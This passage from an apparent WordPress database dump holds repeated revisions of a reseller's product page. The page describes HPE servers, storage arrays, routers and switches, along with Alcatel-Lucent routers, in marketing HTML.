performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:28:08','2019-10-01 09:28:08','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3631,1,'2019-10-01 17:17:53','2019-10-01 09:17:53','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"217\" height=\"164\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 17:17:53','2019-10-01 09:17:53','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(3633,1,'2019-10-01 17:29:36','2019-10-01 09:29:36','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 